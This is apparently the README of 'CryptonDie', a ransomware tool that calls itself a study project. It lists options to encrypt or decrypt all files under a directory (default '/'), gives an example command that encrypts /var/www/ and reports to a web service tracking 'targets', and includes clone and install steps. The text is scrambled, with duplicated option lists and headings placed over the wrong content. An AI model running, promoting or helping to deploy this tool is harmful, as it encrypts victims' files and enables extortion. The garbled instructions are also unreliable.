CryptonDie is a ransomware developed for study purposes.
Options
--key key used to encrypt and decrypt files, default is random string(recommended) --dir Home directory for the attack, default is / --encrypt Encrypt all files --decrypt Decrypt all files --verbose Active verbose mode, default is False Example: python3 cryptondie.py --web-service http://127.0.0.1:5000 --dir /var/www/ --encrypt --verbose
Web service endpoints
--key key used to encrypt and decrypt files, default is random string(recommended)
--dir Home directory for the attack, default is /
--encrypt Encrypt all files
--decrypt Decrypt all files
--verbose Active verbose mode, default is False
Example:
python3 cryptondie.py --web-service http://127.0.0.1:5000 --dir /var/www/ --encrypt --verbose
How to run this shit?
Clonning repository
GET - /targets - list all targets (returns in JSON format)
GET - /targets/<target_id> - list one target by id (returns in JSON format)
POST - /target/<target_id> - create new target
Install requirements
git clone https://github.com/zer0dx/cryptondie
Running web service
pip3 install -r requirements.txt
Running in Docker
cd cryptondie/discovery
python3 service_discovery.py
which encryption is implemented?
Advanced Encryption Standard
Contact
[+] Telegram: @zer0dx [+] Github: https://github.com/zer0dx [+] Twitter: https://twitter.com/zer0dxx [+] Blog: https://zer0dx.github.io
chaos is order yet undeciphered.